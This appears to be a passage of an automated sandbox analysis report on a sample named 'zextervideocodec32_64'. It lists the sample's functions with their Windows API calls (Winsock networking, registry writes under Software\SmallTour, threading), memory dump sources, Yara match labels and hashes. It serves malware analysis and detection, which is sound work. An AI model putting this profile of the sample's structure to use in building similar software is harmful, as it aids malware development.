                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddrErrorFreeH_prologInfoLastgetaddrinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 927184805-0
                                                                                                      • Opcode ID: 6598723f8997deef9d70b5705bb350ae249a5b5a0cf67b6f3bbaa0184e9be839
                                                                                                      • Instruction ID: 3ef42993c7afbaa5f6cf0275ec49aec8bddc479ff0f23cd1423f7fb2a5760307
                                                                                                      • Opcode Fuzzy Hash: 6598723f8997deef9d70b5705bb350ae249a5b5a0cf67b6f3bbaa0184e9be839
                                                                                                      • Instruction Fuzzy Hash: 1851CD715087819FE324DF24C845BABBBE9FF84710F20095DFA99932C0CBB0A945CB92
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: 90d9d9787798a74a05a1bc0cfe2eb91cc2671b28218fd91c71d5630f28c45368
                                                                                                      • Instruction ID: 558d5a3da11220f741bb971c831d220e15176c5424a8aa213e36afb7273f2eda
                                                                                                      • Opcode Fuzzy Hash: 90d9d9787798a74a05a1bc0cfe2eb91cc2671b28218fd91c71d5630f28c45368
                                                                                                      • Instruction Fuzzy Hash: 6D512DB1905256DFCB08DF68D5406AABBF1FF08320F24C5AEE8699B381D7749911CFA1
                                                                                                      APIs
                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 02BC36A7
                                                                                                        • Part of subcall function 02BC2420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02BC2432
                                                                                                        • Part of subcall function 02BC2420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02BC2445
                                                                                                        • Part of subcall function 02BC2420: RtlEnterCriticalSection.NTDLL(?), ref: 02BC2454
                                                                                                        • Part of subcall function 02BC2420: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2469
                                                                                                        • Part of subcall function 02BC2420: RtlLeaveCriticalSection.NTDLL(?), ref: 02BC2470
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                                      • String ID:
                                                                                                      • API String ID: 1601054111-0
                                                                                                      • Opcode ID: 9b32708a2a1df52960ea894032c98192dccf8e36f13f0601524a03bfd7c68163
                                                                                                      • Instruction ID: 6abf90de7e055f011553c47915c26db1da259ddb67211b704e5f0e418baec469
                                                                                                      • Opcode Fuzzy Hash: 9b32708a2a1df52960ea894032c98192dccf8e36f13f0601524a03bfd7c68163
                                                                                                      • Instruction Fuzzy Hash: CB11C4B5104209EBDF219E14DC85FAA3BA5EF00755F6084AAFE568A290CB35D860DB94
                                                                                                      APIs
                                                                                                      • __beginthreadex.LIBCMT ref: 02BD20E6
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02BCA95F,00000000), ref: 02BD2117
                                                                                                      • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02BCA95F,00000000), ref: 02BD2125
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleResumeThread__beginthreadex
                                                                                                      • String ID:
                                                                                                      • API String ID: 1685284544-0
                                                                                                      • Opcode ID: d43a5e037be1ec5f0bf4447a981dfddf46d97d6945e9b4bf810ebe5077a838e9
                                                                                                      • Instruction ID: 553647abbe715106860e1f6f02b12fe1d2f81068b6299f5272c69dcedddb3426
                                                                                                      • Opcode Fuzzy Hash: d43a5e037be1ec5f0bf4447a981dfddf46d97d6945e9b4bf810ebe5077a838e9
                                                                                                      • Instruction Fuzzy Hash: 83F0FC706402019BDB209F5DDC84FD1B3D8EF48325F14459AF644C7292D771E892DF90
                                                                                                      APIs
                                                                                                      • InterlockedIncrement.KERNEL32(02BF72AC), ref: 02BC1ABA
                                                                                                      • WSAStartup.WS2_32(00000002,00000000), ref: 02BC1ACB
                                                                                                      • InterlockedExchange.KERNEL32(02BF72B0,00000000), ref: 02BC1AD7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Interlocked$ExchangeIncrementStartup
                                                                                                      • String ID:
                                                                                                      • API String ID: 1856147945-0
                                                                                                      • Opcode ID: 70178f067e5908d418ae39b44b8591324ed67ec54cbf109f622cfb24de53e48d
                                                                                                      • Instruction ID: 83e1c41d77145f6beace742aaf7cda8378199b8065d99cbb662888c5a1d5097a
                                                                                                      • Opcode Fuzzy Hash: 70178f067e5908d418ae39b44b8591324ed67ec54cbf109f622cfb24de53e48d
                                                                                                      • Instruction Fuzzy Hash: F6D05E31990208ABF62077A8AC0EA78F72CE706751F1006D5FDBAC60C1EE505624A5A7
                                                                                                      APIs
                                                                                                      • __getptd_noexit.LIBCMT ref: 02BD3477
                                                                                                        • Part of subcall function 02BD5C52: GetLastError.KERNEL32(75920A60,7591F550,02BD5E40,02BD3013,7591F550,?,02BC606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02BC6508), ref: 02BD5C54
                                                                                                        • Part of subcall function 02BD5C52: __calloc_crt.LIBCMT ref: 02BD5C75
                                                                                                        • Part of subcall function 02BD5C52: __initptd.LIBCMT ref: 02BD5C97
                                                                                                        • Part of subcall function 02BD5C52: GetCurrentThreadId.KERNEL32 ref: 02BD5C9E
                                                                                                        • Part of subcall function 02BD5C52: SetLastError.KERNEL32(00000000,02BC606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02BC6508), ref: 02BD5CB6
                                                                                                      • __freeptd.LIBCMT ref: 02BD3491
                                                                                                        • Part of subcall function 02BD3576: LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02BD3490), ref: 02BD3590
                                                                                                        • Part of subcall function 02BD3576: GetProcAddress.KERNEL32(00000000), ref: 02BD3597
                                                                                                        • Part of subcall function 02BD3576: RtlEncodePointer.NTDLL(00000000), ref: 02BD35A2
                                                                                                        • Part of subcall function 02BD3576: RtlDecodePointer.NTDLL(02BD3490), ref: 02BD35BD
                                                                                                      • RtlExitUserThread.NTDLL(?,00000000,?,02BD3453,00000000), ref: 02BD349A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastPointerThread$AddressCurrentDecodeEncodeExitLibraryLoadProcUser__calloc_crt__freeptd__getptd_noexit__initptd
                                                                                                      • String ID:
                                                                                                      • API String ID: 2811226776-0
                                                                                                      • Opcode ID: c0d45f4b221bc875a7cc9faf5f717131c257a1c41124e33f4230183e23dc7f2f
                                                                                                      • Instruction ID: 99aa62fc13b1102c201755876229aedf8bc6d3e6e0b87abbaa76f3feb3a199ea
                                                                                                      • Opcode Fuzzy Hash: c0d45f4b221bc875a7cc9faf5f717131c257a1c41124e33f4230183e23dc7f2f
                                                                                                      • Instruction Fuzzy Hash: B8D0A73180161467C6337764C8487CF7DD99F00358F0C04E8D40009106BF246980CFE7
                                                                                                      APIs
                                                                                                      • RegCreateKeyExA.KERNELBASE(80000002,Software\SmallTour), ref: 0040D52A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID: Software\SmallTour
                                                                                                      • API String ID: 2289755597-3113880327
                                                                                                      • Opcode ID: eb4e32b9e61e82fc7f8fc0274ee4e68f45f73c1359f364c673ce3dd768ed4775
                                                                                                      • Instruction ID: 927dd9ebb52ca5c25177259832990301b57c9ecb35a80484e5a468b18b7f84d1
                                                                                                      • Opcode Fuzzy Hash: eb4e32b9e61e82fc7f8fc0274ee4e68f45f73c1359f364c673ce3dd768ed4775
                                                                                                      • Instruction Fuzzy Hash: E101A736D04101EBD6404B70BE61AE27BB5A716B95724417BD592731A3D238890BDA2E
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC4BF2
                                                                                                        • Part of subcall function 02BC1BA7: __EH_prolog.LIBCMT ref: 02BC1BAC
                                                                                                        • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1BBC
                                                                                                        • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1BEA
                                                                                                        • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1C13
                                                                                                        • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1C56
                                                                                                        • Part of subcall function 02BCE0CE: __EH_prolog.LIBCMT ref: 02BCE0D3
                                                                                                        • Part of subcall function 02BCE0CE: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BCE152
                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02BC4CF2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                                      • String ID:
                                                                                                      • API String ID: 1927618982-0
                                                                                                      • Opcode ID: 005c2e671a562ad18086692471e02f61e9bd39511c07145d0fb34e988813e2f8
                                                                                                      • Instruction ID: 8d686b57fd122d4af96dbd6f638414be815374c6b384c842cc62910e7a395891
                                                                                                      • Opcode Fuzzy Hash: 005c2e671a562ad18086692471e02f61e9bd39511c07145d0fb34e988813e2f8
                                                                                                      • Instruction Fuzzy Hash: BC51F571D04248DFDB15EFA8C494AEEBBB5EF08314F2481AEE915AB352DB709A44CF50
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC2D47
                                                                                                      • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02BC2D5C
                                                                                                        • Part of subcall function 02BCA4DF: WSAGetLastError.WS2_32(00000000,?,?,02BC2A51), ref: 02BCA4ED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Send
                                                                                                      • String ID:
                                                                                                      • API String ID: 1282938840-0
                                                                                                      • Opcode ID: 480b9415f27a82ce424fdc4c4b0eb915e690efd597bd419a129f03c1564684d8
                                                                                                      • Instruction ID: 9d77ff2a232a859321eec757ee32f66e4d78b18fccc3a3ab3cad0d54fa7b0276
                                                                                                      • Opcode Fuzzy Hash: 480b9415f27a82ce424fdc4c4b0eb915e690efd597bd419a129f03c1564684d8
                                                                                                      • Instruction Fuzzy Hash: 650184B5501205EFD7206F98D88486FBBEDFF45364B2009AEFC6987200EB709D409BA1
                                                                                                      APIs
                                                                                                      • RegSetValueExA.KERNELBASE(?), ref: 0040D5C1
                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 0040D5CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3132538880-0
                                                                                                      • Opcode ID: 713251547485dac0a2bbd8a3e555094c32b96ee7312fc95f47136c58e5ae1e1e
                                                                                                      • Instruction ID: e6331f095b514331b0d29c0ebab7d5f4f3fc4baceba449352ef9d25cf3a5f709
                                                                                                      • Opcode Fuzzy Hash: 713251547485dac0a2bbd8a3e555094c32b96ee7312fc95f47136c58e5ae1e1e
                                                                                                      • Instruction Fuzzy Hash: 53F06236D05141DBC7054BB0FE61AA57BF1B65ABA1325813AD58272272C334890ADB19
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC83DD
                                                                                                      • shutdown.WS2_32(?,00000002), ref: 02BC83E6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastshutdown
                                                                                                      • String ID:
                                                                                                      • API String ID: 1920494066-0
                                                                                                      • Opcode ID: 7230426c2b84c7999f290d832e8bd4339a8d1dcb964d0c248a58522fa808eb85
                                                                                                      • Instruction ID: 89b7fa61fd2476994c0068fa9b4cd78b16a109d71613a71ecedea68362a2c4d4
                                                                                                      • Opcode Fuzzy Hash: 7230426c2b84c7999f290d832e8bd4339a8d1dcb964d0c248a58522fa808eb85
                                                                                                      • Instruction Fuzzy Hash: 78F03071A45314DFDB20AF68D404B5ABBE5FF09320F15889DEDA59B380EB71AC10CBA1
                                                                                                      APIs
                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F0F,00000000), ref: 00404005
                                                                                                        • Part of subcall function 00403EAC: GetVersionExA.KERNEL32 ref: 00403ECB
                                                                                                      • HeapDestroy.KERNEL32 ref: 00404044
                                                                                                        • Part of subcall function 004043CB: HeapAlloc.KERNEL32(00000000,00000140,0040402D,000003F8), ref: 004043D8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocCreateDestroyVersion
                                                                                                      • String ID:
                                                                                                      • API String ID: 2507506473-0
                                                                                                      • Opcode ID: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                                                                      • Instruction ID: b1684c5e0161eeb02f30399066ba6d75b4260e35b9d13e26dc8fbe5d47634710
                                                                                                      • Opcode Fuzzy Hash: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                                                                      • Instruction Fuzzy Hash: F5F092F0656301DAEB301B75AE46B3A39949BC0796F20443BF740F91E1EF7C8481960D
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC511E
                                                                                                        • Part of subcall function 02BC3D7E: htons.WS2_32(?), ref: 02BC3DA2
                                                                                                        • Part of subcall function 02BC3D7E: htonl.WS2_32(00000000), ref: 02BC3DB9
                                                                                                        • Part of subcall function 02BC3D7E: htonl.WS2_32(00000000), ref: 02BC3DC0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: htonl$H_prologhtons
                                                                                                      • String ID:
                                                                                                      • API String ID: 4039807196-0
                                                                                                      • Opcode ID: 5a304c7f8321b5760ab9dd15413b3a1d8d4193259c1f86fb8d79e02810bfcdfe
                                                                                                      • Instruction ID: b318aaa8e9e04a281e817cd12f0b16e45977c727e233c9d9a4ea047e80ce2672
                                                                                                      • Opcode Fuzzy Hash: 5a304c7f8321b5760ab9dd15413b3a1d8d4193259c1f86fb8d79e02810bfcdfe
                                                                                                      • Instruction Fuzzy Hash: A98145B1D0424E8ECF15DFA8D580AEEBBB5EF48210F2081AED851B7241EB716A45CF74
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: 230b824c50c8ce0514ae740f82f8b6e7ffdec73107d2720661bf0b4c3ce674f0
                                                                                                      • Instruction ID: 102ffe6da4e6837c07718f2922c5887d1d6eed4405e2e6407544d1648ea36059
                                                                                                      • Opcode Fuzzy Hash: 230b824c50c8ce0514ae740f82f8b6e7ffdec73107d2720661bf0b4c3ce674f0
                                                                                                      • Instruction Fuzzy Hash: 2541097190120AAFCF15DF99C890EEEBBB9FF88314F2441AEE545A7240D7749A45CBA0
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BCE99C
                                                                                                        • Part of subcall function 02BC1A01: TlsGetValue.KERNEL32 ref: 02BC1A0A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prologValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3700342317-0
                                                                                                      • Opcode ID: 0194c49563a72f30f21589cd6d5b166fc24fa3aaa98388603b093c36a64097c4
                                                                                                      • Instruction ID: 9f08f42625341735a9bd6624c4f1efb4d356f4d5c0a6355255fb7058dfe65c5b
                                                                                                      • Opcode Fuzzy Hash: 0194c49563a72f30f21589cd6d5b166fc24fa3aaa98388603b093c36a64097c4
                                                                                                      • Instruction Fuzzy Hash: 8D211BB2904209EFDB14DFA9D540AEEBBF9EF48310F2041AEE915E7240D771A901CBA1
                                                                                                      APIs
                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 0040D5CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID:
                                                                                                      • API String ID: 3535843008-0
                                                                                                      • Opcode ID: 602ae3e857ddb9a477b990e8c51bbb5b03d0f4ff67d1b8e24c6534ee993f563a
                                                                                                      • Instruction ID: a36abb13542148fe0e2184bce6fc4a30d84a4443659d953cd64425ef62fa15e7
                                                                                                      • Opcode Fuzzy Hash: 602ae3e857ddb9a477b990e8c51bbb5b03d0f4ff67d1b8e24c6534ee993f563a
                                                                                                      • Instruction Fuzzy Hash: 47117139904252DBC3018B74EE55AA57FB0F61B750318457AC8D162363C334DD0BDB5C
                                                                                                      APIs
                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 0040D5CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID:
                                                                                                      • API String ID: 3535843008-0
                                                                                                      • Opcode ID: e6f74f1aae8f8915e941b36548827f360267f7e4e505bab853985922fbd2a965
                                                                                                      • Instruction ID: b75ff2dc20aaa2e6f21dbf5a413c5fb9bbeedf7bbd5764e02b2ca00ed5a47c52
                                                                                                      • Opcode Fuzzy Hash: e6f74f1aae8f8915e941b36548827f360267f7e4e505bab853985922fbd2a965
                                                                                                      • Instruction Fuzzy Hash: E201F53A8052629BCB018B74FE61691BFB1F65A7A1324427AD5D263273C7358C0BC758
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BFA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BFA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bfa000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: b10560d7e5c54b7bf6027b605ee94fd758f7f77f435ae11517a1e738f0f0a1eb
                                                                                                      • Instruction ID: 3d47765c70f113d8b732e134ca24a81fda6fae1d3aff66776b6547dc38610deb
                                                                                                      • Opcode Fuzzy Hash: b10560d7e5c54b7bf6027b605ee94fd758f7f77f435ae11517a1e738f0f0a1eb
                                                                                                      • Instruction Fuzzy Hash: 5E110CB211C6049FD719AF29D885779FBE8EF48710F06092DE6C5C7740EA319444CA9B
                                                                                                      APIs
                                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02BC33CC
                                                                                                        • Part of subcall function 02BC32AB: __EH_prolog.LIBCMT ref: 02BC32B0
                                                                                                        • Part of subcall function 02BC32AB: RtlEnterCriticalSection.NTDLL(?), ref: 02BC32C3
                                                                                                        • Part of subcall function 02BC32AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02BC32EF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                                                      • String ID:
                                                                                                      • API String ID: 1518410164-0
                                                                                                      • Opcode ID: a4f7783ed780c5b063fc06a9587726b192379c5d060867276e7e5ad1259ceda0
                                                                                                      • Instruction ID: 8a6f6c5d4c539d4967a9179bb3f20778ed4367ff24d054e1afc911054121ed95
                                                                                                      • Opcode Fuzzy Hash: a4f7783ed780c5b063fc06a9587726b192379c5d060867276e7e5ad1259ceda0
                                                                                                      • Instruction Fuzzy Hash: 79019670214606AFDB04CF59D885F55F7A9FF44320B64C39DE828872C0EB70E811CBA0
                                                                                                      APIs
                                                                                                        • Part of subcall function 02BCD39A: __EH_prolog.LIBCMT ref: 02BCD39F
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02BCDC84
                                                                                                        • Part of subcall function 02BD453A: RaiseException.KERNEL32(?,?,02BCFB35,?,?,?,?,?,?,?,02BCFB35,?,02BF0F98,?), ref: 02BD458F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionException@8H_prologRaiseThrow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1681477883-0
                                                                                                      • Opcode ID: f4a0cc72595b2a760185a543839f05af4bf35283372f5b76e831c349c226327a
                                                                                                      • Instruction ID: 091135920009ebacd8792c6da858ff57ad2926436dbec86c07b9cc761f52a607
                                                                                                      • Opcode Fuzzy Hash: f4a0cc72595b2a760185a543839f05af4bf35283372f5b76e831c349c226327a
                                                                                                      • Instruction Fuzzy Hash: 4CF04F719142096BD618ABA9D845D9B73FDEB08614B40459DF60693610EAA2B8448BA1
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: c377e47094d1c1f418745f8923c2daa3cfa784174354ddc77f39fa208488e0e1
                                                                                                      • Instruction ID: dad39ec4c4a36b0a020ba36cb40b54c5f2fcb52c5045fa4b7e1fd514a1d859ca
                                                                                                      • Opcode Fuzzy Hash: c377e47094d1c1f418745f8923c2daa3cfa784174354ddc77f39fa208488e0e1
                                                                                                      • Instruction Fuzzy Hash: 02014B34A0030ACBDB14CFA9D8D0B9637A0BB05750F6446AAD965EB295D734D90ACF26
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BCE52C
                                                                                                        • Part of subcall function 02BC26DB: RtlEnterCriticalSection.NTDLL(?), ref: 02BC2706
                                                                                                        • Part of subcall function 02BC26DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02BC272B
                                                                                                        • Part of subcall function 02BC26DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BE5B33), ref: 02BC2738
                                                                                                        • Part of subcall function 02BC26DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02BC2778
                                                                                                        • Part of subcall function 02BC26DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02BC27D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                      • String ID:
                                                                                                      • API String ID: 4293676635-0
                                                                                                      • Opcode ID: 7b844d4148247cb796d0de53028a419c8485180186bc7c0409f1fba2607740fc
                                                                                                      • Instruction ID: e152ae026d3c1f41e06784648db8e539c7fcade7a91d68808a6bf5fbe45219d9
                                                                                                      • Opcode Fuzzy Hash: 7b844d4148247cb796d0de53028a419c8485180186bc7c0409f1fba2607740fc
                                                                                                      • Instruction Fuzzy Hash: 9D0190B1911B049FC718CF1AC540946FBF9EF88710B15C6EE985A8B721E7B1AA40CF94
